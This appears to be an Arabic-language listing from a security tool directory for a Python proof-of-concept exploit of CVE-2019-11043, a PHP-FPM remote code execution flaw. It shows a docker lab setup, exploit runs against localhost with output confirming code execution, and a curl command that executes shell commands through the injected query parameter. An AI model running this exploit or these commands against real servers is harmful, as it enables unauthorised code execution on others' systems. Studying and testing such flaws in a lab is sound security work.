Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/themiddleblue/cve-2019-11043
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubthemiddleblue/cve-2019-11043

CVE-2019-11043

(PoC) نسخة بايثون من استغلال CVE-2019-11043 بواسطة neex

عرض المستودع
14645منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC CVE-2019-11043

نسخة Python من استغلال CVE-2019-11043 https://github.com/neex/phuip-fpizdam
لا يزال هذا الـ PoC مسودة، يرجى استخدام الاستغلال الذي كتبه @neex
تحليل الثغرة: https://paper.seebug.org/1064/

إعداد PoC

فقط قم بتشغيل docker compose لتشغيل nginx وphp-fpm:

root@kitploit:~
# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

إذا كنت ترغب في قراءة سجلات php-fpm، يمكنك تشغيل:

root@kitploit:~
docker logs --tail 10 --follow php

الاستغلال

root@kitploit:~
# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

يجب أن تكون قادرًا على تنفيذ الأوامر باستخدام:

root@kitploit:~
curl http://localhost/index.php?a=bin/ls+/

إذا كنت تريد فقط التحقق من وجود الثغرة، وتخطي الاستغلال:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

يمكنك محاولة قتل عملية php-fpm وإعادة تعيين جميع إعدادات PHP المحقونة باستخدام --reset:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --reset

فيديو PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

تنزيل الأداة